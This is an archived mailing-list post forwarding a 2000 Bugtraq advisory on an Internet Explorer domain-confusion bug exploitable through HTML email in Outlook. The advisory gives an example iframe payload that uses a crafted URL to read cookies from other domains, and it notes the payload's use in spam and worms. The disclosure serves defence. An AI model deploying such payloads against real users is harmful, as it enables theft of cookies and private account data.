[Esa-l] IE Domain Confusion Vulnerability is an Email problem also (fwd)
John D. Hardin
jhardin at wolfenet.com
Sat May 13 16:31:59 PDT 2000
Yet another vulnerability the Sanitizer protects against...
---------- Forwarded message ----------
Date: Fri, 12 May 2000 08:33:48 -0400
From: Richard M. Smith <rms2000 at BELLATLANTIC.NET>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: IE Domain Confusion Vulnerability is an Email problem also
Hi,
This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express. The trick is
to put the magic URL in an HTML IFRAME tag. Example:
<DEFANGED_iframe
src="http://www.peacefire.org/security/iecookies/
showcookie.html%3f.yahoo.com/">
</iframe>
A malicious Email message could include many IFRAMEs
to grab cookies from different domains. The cookies
are stolen when the message is read.
Using an Email message, an attack can be directed
at a particular person or a group of people without
them every going to a Web site. The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.
I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.
This is a pretty bad bug. People's private data at
Web sites is at risk here.
Richard
==========================================
Richard M. Smith
Internet consultant
Email: rms2000 at bellatlantic.net
http://www.tiac.net/users/smiths
==========================================
More information about the esd-l
mailing list